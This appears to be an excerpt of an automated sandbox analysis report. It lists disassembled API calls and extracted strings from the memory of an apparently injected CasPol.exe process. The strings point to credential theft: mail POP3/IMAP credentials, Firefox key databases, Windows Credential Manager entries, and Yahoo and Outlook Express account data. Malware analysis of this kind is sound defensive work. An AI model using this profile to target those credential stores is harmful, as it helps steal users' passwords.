                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                  • API String ID: 524865279-2190619648
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                  • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                  • String ID: key3.db$key4.db
                                                                                                                                                                                  • API String ID: 581844971-3557030128
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                                  • API String ID: 2300387033-3849865405
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                  • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                  • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                  • String ID: %s (%s)
                                                                                                                                                                                  • API String ID: 3756086014-1363028141
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                  • API String ID: 125969286-791839006
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                  • String ID: caption$dialog_%d
                                                                                                                                                                                  • API String ID: 2923679083-4161923789
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                  • unknown error, xrefs: 004277B2
                                                                                                                                                                                  • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                  • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                  • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                  • API String ID: 3510742995-3035234601
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                  • API String ID: 2221118986-3608744896
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                    • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmpmemcpy
                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                  • memset.MSVCRT ref: 00410246
                                                                                                                                                                                  • memset.MSVCRT ref: 00410258
                                                                                                                                                                                    • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                  • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                  • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                  • String ID: imap$pop3$smtp
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                  • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                  • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                                                                                  • String ID: global-salt$password-check
                                                                                                                                                                                  • API String ID: 231171946-3927197501
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                  • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                  • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 19018683-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                    • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                    • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                    • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 438689982-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                  • memset.MSVCRT ref: 00444978
                                                                                                                                                                                  • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                  • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                    • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset$strlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2142929671-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                    • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                                                  • String ID: Passport.Net\*
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                  • memset.MSVCRT ref: 0040330B
                                                                                                                                                                                  • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                                    • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                                    • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                                                  • String ID: Personalities
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00444573
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                  • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLastMessagesprintf
                                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00410FA2
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410FB0
                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00410FC8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                  • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0043DFC5
                                                                                                                                                                                  • memset.MSVCRT ref: 0043DFFE
                                                                                                                                                                                  • memcpy.MSVCRT(00000001,B2850F59,00000000,?,00000001,00000000), ref: 0043E27C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
